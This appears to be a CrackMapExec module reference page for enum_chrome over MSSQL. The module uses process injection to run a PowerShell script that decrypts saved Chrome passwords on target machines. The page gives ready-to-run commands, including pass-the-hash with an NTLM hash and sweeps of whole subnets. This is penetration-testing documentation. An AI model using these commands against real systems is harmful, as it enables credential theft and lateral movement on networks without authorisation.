CrackMapExec Enum_chrome (mssql)
This page contains detailed information about how to use the enum_chrome CME module while using the mssql protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.
Description
This module executes Get-ChromeDump.ps1 PowerShell module to decrypt saved Chrome credentials, secrets and passwords. It uses process injection (Invoke-PSInject.ps1) to execute the module.
The enum_chrome module is OPSEC unsafe which means that it may touch the disk and therefore can trigger an alarm.
Supported Protocols
- mssql
- smb
Module Source Code
Authors
Module Usage
This is how to use the enum_chrome module while using the mssql protocol:
Syntax:
# cme mssql <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M enum_chrome
Admin user:
# cme mssql 10.0.5.1 -u sa -p P@ss123 -d . -M enum_chrome
# cme mssql 10.0.5.1 -u sa -p P@ss123 --local-auth -M enum_chrome
Normal user:
# cme mssql 10.0.5.1 -u dbuser -p P@ss123 -d target.corp -M enum_chrome
CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:
# cme mssql 10.0.5.1 -u sa -H 432b022dc22aa5afe884e986b8383ff2 -d . -M enum_chrome
# cme mssql 10.0.5.1 -u dbuser -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M enum_chrome
# cme mssql target_list.txt -u sa -p P@ss123 -d . -M enum_chrome
# cme mssql 10.0.5.0/24 -u sa -p P@ss123 -d . -M enum_chrome
# cme mssql 10.0.5.1-100 -u sa -p P@ss123 -d . -M enum_chrome
Module Options
As you can see below, the enum_chrome module doesn't have any additional options:
# cme mssql -M enum_chrome --options
[*] enum_chrome module options:
References
- https://github.com/xorrior/RandomPS-Scripts/blob/master/Get-ChromeDump.ps1
- https://github.com/EmpireProject/PSInject/blob/master/Invoke-PSInject.ps1
Version
This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.
